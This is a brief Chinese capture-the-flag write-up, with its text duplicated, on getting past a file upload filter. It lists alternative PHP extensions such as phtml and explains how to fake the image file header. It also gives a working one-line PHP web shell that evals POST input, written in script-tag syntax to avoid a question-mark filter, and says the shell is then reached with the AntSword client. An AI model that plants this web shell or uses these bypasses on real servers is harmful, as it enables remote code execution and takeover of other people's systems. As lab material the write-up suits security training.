绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht
这里phtml可以成功
这里发现过滤了?号
还有文件头 改jpeg\png\gif都可以
绕过问号
<script language="pHp">@eval($_POST['cmd'])</script>
这里上传的文件在upload目录下
下面使用蚁剑连接
剩下的flag 你们自己找找啦 <"v">
绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht
这里phtml可以成功
这里发现过滤了?号
还有文件头 改jpeg\png\gif都可以
绕过问号
<script language="pHp">@eval($_POST['cmd'])</script>
这里上传的文件在upload目录下
下面使用蚁剑连接
剩下的flag 你们自己找找啦 <"v">